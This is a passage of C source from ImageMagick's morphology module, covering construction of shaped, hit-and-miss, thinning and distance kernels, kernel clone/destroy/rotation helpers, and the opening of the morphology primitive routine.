kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case DiskKernel:
{
ssize_t
limit = (ssize_t)(args->rho*args->rho);
if (args->rho < 0.4) /* default radius approx 4.3 */
kernel->width = kernel->height = 9L, limit = 18L;
else
kernel->width = kernel->height = (size_t)fabs(args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ((u*u+v*v) <= limit)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case PlusKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along axises to given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == 0 || v == 0) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
case CrossKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values along axises to given scale */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = (u == v || u == -v) ? args->sigma : nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
kernel->positive_range = args->sigma*(kernel->width*2.0 - 1.0);
break;
}
/*
HitAndMiss Kernels
*/
case RingKernel:
case PeaksKernel:
{
ssize_t
limit1,
limit2,
scale;
if (args->rho < args->sigma)
{
kernel->width = ((size_t)args->sigma)*2+1;
limit1 = (ssize_t)(args->rho*args->rho);
limit2 = (ssize_t)(args->sigma*args->sigma);
}
else
{
kernel->width = ((size_t)args->rho)*2+1;
limit1 = (ssize_t)(args->sigma*args->sigma);
limit2 = (ssize_t)(args->rho*args->rho);
}
if ( limit2 <= 0 )
kernel->width = 7L, limit1 = 7L, limit2 = 11L;
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set a ring of points of 'scale' ( 0.0 for PeaksKernel ) */
scale = (ssize_t) (( type == PeaksKernel) ? 0.0 : args->xi);
for ( i=0, v= -kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ ssize_t radius=u*u+v*v;
if (limit1 < radius && radius <= limit2)
kernel->positive_range += kernel->values[i] = (double) scale;
else
kernel->values[i] = nan;
}
kernel->minimum = kernel->maximum = (double) scale;
if ( type == PeaksKernel ) {
/* set the central point in the middle */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
kernel->maximum = 1.0;
}
break;
}
case EdgesKernel:
{
kernel=AcquireKernelInfo("ThinSE:482");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandMirrorKernelInfo(kernel); /* mirror expansion of kernels */
break;
}
case CornersKernel:
{
kernel=AcquireKernelInfo("ThinSE:87");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* Expand 90 degree rotations */
break;
}
case DiagonalsKernel:
{
switch ( (int) args->rho ) {
case 0:
default:
{ KernelInfo
*new_kernel;
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
new_kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
ExpandMirrorKernelInfo(kernel);
return(kernel);
}
case 1:
kernel=ParseKernelArray("3: 0,0,0 0,-,1 1,1,-");
break;
case 2:
kernel=ParseKernelArray("3: 0,0,1 0,-,1 0,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineEndsKernel:
{ /* Kernels for finding the end of thin lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all end of lines */
return(AcquireKernelInfo("LineEnds:1>;LineEnds:2>"));
case 1:
/* kernel for 4-connected line ends - no rotation */
kernel=ParseKernelArray("3: 0,0,- 0,1,1 0,0,-");
break;
case 2:
/* kernel to add for 8-connected lines - no rotation */
kernel=ParseKernelArray("3: 0,0,0 0,1,0 0,0,1");
break;
case 3:
/* kernel to add for orthogonal line ends - does not find corners */
kernel=ParseKernelArray("3: 0,0,0 0,1,1 0,0,0");
break;
case 4:
/* traditional line end - fails on last T end */
kernel=ParseKernelArray("3: 0,0,0 0,1,- 0,0,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case LineJunctionsKernel:
{ /* kernels for finding the junctions of multiple lines */
switch ( (int) args->rho ) {
case 0:
default:
/* set of kernels to find all line junctions */
return(AcquireKernelInfo("LineJunctions:1@;LineJunctions:2>"));
case 1:
/* Y Junction */
kernel=ParseKernelArray("3: 1,-,1 -,1,- -,1,-");
break;
case 2:
/* Diagonal T Junctions */
kernel=ParseKernelArray("3: 1,-,- -,1,- 1,-,1");
break;
case 3:
/* Orthogonal T Junctions */
kernel=ParseKernelArray("3: -,-,- 1,1,1 -,1,-");
break;
case 4:
/* Diagonal X Junctions */
kernel=ParseKernelArray("3: 1,-,1 -,1,- 1,-,1");
break;
case 5:
/* Orthogonal X Junctions - minimal diamond kernel */
kernel=ParseKernelArray("3: -,1,- 1,1,1 -,1,-");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
case RidgesKernel:
{ /* Ridges - Ridge finding kernels */
KernelInfo
*new_kernel;
switch ( (int) args->rho ) {
case 1:
default:
kernel=ParseKernelArray("3x1:0,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 2 rotated kernels (symmetrical) */
break;
case 2:
kernel=ParseKernelArray("4x1:0,1,1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotated kernels */
/* Kernels to find a stepped 'thick' line, 4 rotates + mirrors */
/* Unfortunatally we can not yet rotate a non-square kernel */
/* But then we can't flip a non-symetrical kernel either */
new_kernel=ParseKernelArray("4x3+1+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:0,1,1,- -,1,1,- -,1,1,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+1+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("4x3+2+1:-,1,1,0 -,1,1,- 0,1,1,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:0,-,- 1,1,1 1,1,1 -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+1:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
new_kernel=ParseKernelArray("3x4+1+2:-,-,0 1,1,1 1,1,1 0,-,-");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
LastKernelInfo(kernel)->next = new_kernel;
break;
}
break;
}
case ConvexHullKernel:
{
KernelInfo
*new_kernel;
/* first set of 8 kernels */
kernel=ParseKernelArray("3: 1,1,- 1,0,- 1,-,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 90.0);
/* append the mirror versions too - no flip function yet */
new_kernel=ParseKernelArray("3: 1,1,1 1,0,- -,-,0");
if (new_kernel == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
new_kernel->type = type;
ExpandRotateKernelInfo(new_kernel, 90.0);
LastKernelInfo(kernel)->next = new_kernel;
break;
}
case SkeletonKernel:
{
switch ( (int) args->rho ) {
case 1:
default:
/* Traditional Skeleton...
** A cyclically rotated single kernel
*/
kernel=AcquireKernelInfo("ThinSE:482");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ExpandRotateKernelInfo(kernel, 45.0); /* 8 rotations */
break;
case 2:
/* HIPR Variation of the cyclic skeleton
** Corners of the traditional method made more forgiving,
** but the retain the same cyclic order.
*/
kernel=AcquireKernelInfo("ThinSE:482; ThinSE:87x90;");
if (kernel == (KernelInfo *) NULL)
return(kernel);
if (kernel->next == (KernelInfo *) NULL)
return(DestroyKernelInfo(kernel));
kernel->type = type;
kernel->next->type = type;
ExpandRotateKernelInfo(kernel, 90.0); /* 4 rotations of the 2 kernels */
break;
case 3:
/* Dan Bloomberg Skeleton, from his paper on 3x3 thinning SE's
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
*/
kernel=AcquireKernelInfo(
"ThinSE:41; ThinSE:42; ThinSE:43");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->next->type = type;
kernel->next->next->type = type;
ExpandMirrorKernelInfo(kernel); /* 12 kernels total */
break;
}
break;
}
case ThinSEKernel:
{ /* Special kernels for general thinning, while preserving connections
** "Connectivity-Preserving Morphological Image Thransformations"
** by Dan S. Bloomberg, available on Leptonica, Selected Papers,
** http://www.leptonica.com/papers/conn.pdf
** And
** http://tpgit.github.com/Leptonica/ccthin_8c_source.html
**
** Note kernels do not specify the origin pixel, allowing them
** to be used for both thickening and thinning operations.
*/
switch ( (int) args->rho ) {
/* SE for 4-connected thinning */
case 41: /* SE_4_1 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,-,1");
break;
case 42: /* SE_4_2 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 -,0,-");
break;
case 43: /* SE_4_3 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,-,1");
break;
case 44: /* SE_4_4 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,-");
break;
case 45: /* SE_4_5 */
kernel=ParseKernelArray("3: -,0,1 0,-,1 -,0,-");
break;
case 46: /* SE_4_6 */
kernel=ParseKernelArray("3: -,0,- 0,-,1 -,0,1");
break;
case 47: /* SE_4_7 */
kernel=ParseKernelArray("3: -,1,1 0,-,1 -,0,-");
break;
case 48: /* SE_4_8 */
kernel=ParseKernelArray("3: -,-,1 0,-,1 0,-,1");
break;
case 49: /* SE_4_9 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 -,-,1");
break;
/* SE for 8-connected thinning - negatives of the above */
case 81: /* SE_8_0 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 -,1,-");
break;
case 82: /* SE_8_2 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,-,-");
break;
case 83: /* SE_8_3 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 -,1,-");
break;
case 84: /* SE_8_4 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,-");
break;
case 85: /* SE_8_5 */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,-");
break;
case 86: /* SE_8_6 */
kernel=ParseKernelArray("3: 0,-,- 0,-,1 0,-,1");
break;
case 87: /* SE_8_7 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,0,-");
break;
case 88: /* SE_8_8 */
kernel=ParseKernelArray("3: -,1,- 0,-,1 0,1,-");
break;
case 89: /* SE_8_9 */
kernel=ParseKernelArray("3: 0,1,- 0,-,1 -,1,-");
break;
/* Special combined SE kernels */
case 423: /* SE_4_2 , SE_4_3 Combined Kernel */
kernel=ParseKernelArray("3: -,-,1 0,-,- -,0,-");
break;
case 823: /* SE_8_2 , SE_8_3 Combined Kernel */
kernel=ParseKernelArray("3: -,1,- -,-,1 0,-,-");
break;
case 481: /* SE_48_1 - General Connected Corner Kernel */
kernel=ParseKernelArray("3: -,1,1 0,-,1 0,0,-");
break;
default:
case 482: /* SE_48_2 - General Edge Kernel */
kernel=ParseKernelArray("3: 0,-,1 0,-,1 0,-,1");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->sigma);
break;
}
/*
Distance Measuring Kernels
*/
case ChebyshevKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*MagickMax(fabs((double)u),fabs((double)v)) );
kernel->maximum = kernel->values[0];
break;
}
case ManhattanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*(labs((long) u)+labs((long) v)) );
kernel->maximum = kernel->values[0];
break;
}
case OctagonalKernel:
{
if (args->rho < 2.0)
kernel->width = kernel->height = 5; /* default/minimum radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{
double
r1 = MagickMax(fabs((double)u),fabs((double)v)),
r2 = floor((double)(labs((long)u)+labs((long)v)+1)/1.5);
kernel->positive_range += kernel->values[i] =
args->sigma*MagickMax(r1,r2);
}
kernel->maximum = kernel->values[0];
break;
}
case EuclideanKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->positive_range += ( kernel->values[i] =
args->sigma*sqrt((double)(u*u+v*v)) );
kernel->maximum = kernel->values[0];
break;
}
default:
{
/* No-Op Kernel - Basically just a single pixel on its own */
kernel=ParseKernelArray("1:1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = UndefinedKernel;
break;
}
break;
}
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CloneKernelInfo() creates a new clone of the given Kernel List so that its
% can be modified without effecting the original. The cloned kernel should
% be destroyed using DestoryKernelInfo() when no longer needed.
%
% The format of the CloneKernelInfo method is:
%
% KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be cloned
%
*/
MagickExport KernelInfo *CloneKernelInfo(const KernelInfo *kernel)
{
register ssize_t
i;
KernelInfo
*new_kernel;
assert(kernel != (KernelInfo *) NULL);
new_kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (new_kernel == (KernelInfo *) NULL)
return(new_kernel);
*new_kernel=(*kernel); /* copy values in structure */
/* replace the values with a copy of the values */
new_kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (new_kernel->values == (double *) NULL)
return(DestroyKernelInfo(new_kernel));
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
new_kernel->values[i]=kernel->values[i];
/* Also clone the next kernel in the kernel list */
if ( kernel->next != (KernelInfo *) NULL ) {
new_kernel->next = CloneKernelInfo(kernel->next);
if ( new_kernel->next == (KernelInfo *) NULL )
return(DestroyKernelInfo(new_kernel));
}
return(new_kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyKernelInfo() frees the memory used by a Convolution/Morphology
% kernel.
%
% The format of the DestroyKernelInfo method is:
%
% KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to be destroyed
%
*/
MagickExport KernelInfo *DestroyKernelInfo(KernelInfo *kernel)
{
assert(kernel != (KernelInfo *) NULL);
if ( kernel->next != (KernelInfo *) NULL )
kernel->next = DestroyKernelInfo(kernel->next);
kernel->values = (double *)RelinquishMagickMemory(kernel->values);
kernel = (KernelInfo *) RelinquishMagickMemory(kernel);
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d M i r r o r K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ExpandMirrorKernelInfo() takes a single kernel, and expands it into a
% sequence of 90-degree rotated kernels but providing a reflected 180
% rotatation, before the -/+ 90-degree rotations.
%
% This special rotation order produces a better, more symetrical thinning of
% objects.
%
% The format of the ExpandMirrorKernelInfo method is:
%
% void ExpandMirrorKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% This function is only internel to this module, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
#if 0
static void FlopKernelInfo(KernelInfo *kernel)
{ /* Do a Flop by reversing each row. */
size_t
y;
register ssize_t
x,r;
register double
*k,t;
for ( y=0, k=kernel->values; y < kernel->height; y++, k+=kernel->width)
for ( x=0, r=kernel->width-1; x<kernel->width/2; x++, r--)
t=k[x], k[x]=k[r], k[r]=t;
kernel->x = kernel->width - kernel->x - 1;
angle = fmod(angle+180.0, 360.0);
}
#endif
static void ExpandMirrorKernelInfo(KernelInfo *kernel)
{
KernelInfo
*clone,
*last;
last = kernel;
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, 180); /* flip */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, 90); /* transpose */
LastKernelInfo(last)->next = clone;
last = clone;
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, 180); /* flop */
LastKernelInfo(last)->next = clone;
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ E x p a n d R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ExpandRotateKernelInfo() takes a kernel list, and expands it by rotating
% incrementally by the angle given, until the kernel repeats.
%
% WARNING: 45 degree rotations only works for 3x3 kernels.
% While 90 degree roatations only works for linear and square kernels
%
% The format of the ExpandRotateKernelInfo method is:
%
% void ExpandRotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
% This function is only internel to this module, as it is not finalized,
% especially with regard to non-orthogonal angles, and rotation of larger
% 2D kernels.
*/
/* Internal Routine - Return true if two kernels are the same */
static MagickBooleanType SameKernelInfo(const KernelInfo *kernel1,
const KernelInfo *kernel2)
{
register size_t
i;
/* check size and origin location */
if ( kernel1->width != kernel2->width
|| kernel1->height != kernel2->height
|| kernel1->x != kernel2->x
|| kernel1->y != kernel2->y )
return MagickFalse;
/* check actual kernel values */
for (i=0; i < (kernel1->width*kernel1->height); i++) {
/* Test for Nan equivelence */
if ( IsNan(kernel1->values[i]) && !IsNan(kernel2->values[i]) )
return MagickFalse;
if ( IsNan(kernel2->values[i]) && !IsNan(kernel1->values[i]) )
return MagickFalse;
/* Test actual values are equivelent */
if ( fabs(kernel1->values[i] - kernel2->values[i]) > MagickEpsilon )
return MagickFalse;
}
return MagickTrue;
}
static void ExpandRotateKernelInfo(KernelInfo *kernel, const double angle)
{
KernelInfo
*clone,
*last;
last = kernel;
while(1) {
clone = CloneKernelInfo(last);
RotateKernelInfo(clone, angle);
if ( SameKernelInfo(kernel, clone) == MagickTrue )
break;
LastKernelInfo(last)->next = clone;
last = clone;
}
clone = DestroyKernelInfo(clone); /* kernel has repeated - junk the clone */
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ C a l c M e t a K e r n a l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CalcKernelMetaData() recalculate the KernelInfo meta-data of this kernel only,
% using the kernel values. This should only ne used if it is not posible to
% calculate that meta-data in some easier way.
%
% It is important that the meta-data is correct before ScaleKernelInfo() is
% used to perform kernel normalization.
%
% The format of the CalcKernelMetaData method is:
%
% void CalcKernelMetaData(KernelInfo *kernel, const double scale )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% WARNING: Minimum and Maximum values are assumed to include zero, even if
% zero is not part of the kernel (as in Gaussian Derived kernels). This
% however is not true for flat-shaped morphological kernels.
%
% WARNING: Only the specific kernel pointed to is modified, not a list of
% multiple kernels.
%
% This is an internal function and not expected to be useful outside this
% module. This could change however.
*/
static void CalcKernelMetaData(KernelInfo *kernel)
{
register size_t
i;
kernel->minimum = kernel->maximum = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; i < (kernel->width*kernel->height); i++)
{
if ( fabs(kernel->values[i]) < MagickEpsilon )
kernel->values[i] = 0.0;
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y A p p l y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyApply() applies a morphological method, multiple times using
% a list of multiple kernels.
%
% It is basically equivelent to as MorphologyImageChannel() (see below) but
% without any user controls. This allows internel programs to use this
% function, to actually perform a specific task without posible interference
% by any API user supplied settings.
%
% It is MorphologyImageChannel() task to extract any such user controls, and
% pass them to this function for processing.
%
% More specifically kernels are not normalized/scaled/blended by the
% 'convolve:scale' Image Artifact (setting), nor is the convolve bias
% (-bias setting or image->bias) loooked at, but must be supplied from the
% function arguments.
%
% The format of the MorphologyApply method is:
%
% Image *MorphologyApply(const Image *image,MorphologyMethod method,
% const ChannelType channel, const ssize_t iterations,
% const KernelInfo *kernel, const CompositeMethod compose,
% const double bias, ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the source image
%
% o method: the morphology method to be applied.
%
% o channel: the channels to which the operations are applied
% The channel 'sync' flag determines if 'alpha weighting' is
% applied for convolution style operations.
%
% o iterations: apply the operation this many times (or no change).
% A value of -1 means loop until no change found.
% How this is applied may depend on the morphology method.
% Typically this is a value of 1.
%
% o channel: the channel type.
%
% o kernel: An array of double representing the morphology kernel.
%
% o compose: How to handle or merge multi-kernel results.
% If 'UndefinedCompositeOp' use default for the Morphology method.
% If 'NoCompositeOp' force image to be re-iterated by each kernel.
% Otherwise merge the results using the compose method given.
%
% o bias: Convolution Output Bias.
%
% o exception: return any errors or warnings in this structure.
%
*/
/* Apply a Morphology Primative to an image using the given kernel.
** Two pre-created images must be provided, and no image is created.
** It returns the number of pixels that changed between the images
** for result convergence determination.
*/
static size_t MorphologyPrimitive(const Image *image, Image *result_image,
const MorphologyMethod method, const ChannelType channel,
const KernelInfo *kernel,const double bias,ExceptionInfo *exception)
{
#define MorphologyTag "Morphology/Image"
CacheView
*p_view,
*q_view;
ssize_t
y, offx, offy;
size_t
virt_width,
changed;
MagickBooleanType
status;
MagickOffsetType
progress;
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
assert(result_image != (Image *) NULL);
assert(result_image->signature == MagickSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
status=MagickTrue;
changed=0;
progress=0;
p_view=AcquireCacheView(image);
q_view=AcquireCacheView(result_image);
virt_width=image->columns-kernel->width-1;
/* Some methods (including convolve) needs use a reflected kernel.
* Adjust 'origin' offsets to loop though kernel as a reflection.
*/
offx = kernel->x;
offy = kernel->y;
switch(method) {
case ConvolveMorphology:
case DilateMorphology:
case DilateIntensityMorphology:
/*case DistanceMorphology:*/
/* kernel needs to used with reflection about origin */
offx = (ssize_t) kernel->width-offx-1;
offy = (ssize_t) kernel->height-offy-1;
break;
case ErodeMorphology:
case ErodeIntensityMorphology:
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
/* kernel is used as is, without reflection */
break;
default:
assert("Not a Primitive Morphology Method" != (char *) NULL);
break;
}
if ( method == ConvolveMorphology && kernel->width == 1 )
{ /* Special handling (for speed) of vertical (blur) kernels.
** This performs its handling in columns rather than in rows.
** This is only done for convolve as it is the only method that
** generates very large 1-D vertical kernels (such as a 'BlurKernel')
**
** Timing tests (on single CPU laptop)
** Using a vertical 1-d Blue with normal row-by-row (below)
** time convert logo: -morphology Convolve Blur:0x10+90 null:
** 0.807u
** Using this column method
** time convert logo: -morphology Convolve Blur:0x10+90 null:
** 0.620u
**
** Anthony Thyssen, 14 June 2010
*/
register ssize_t
x;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(dynamic,4) shared(progress,status)
#endif
for (x=0; x < (ssize_t) image->columns; x++)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
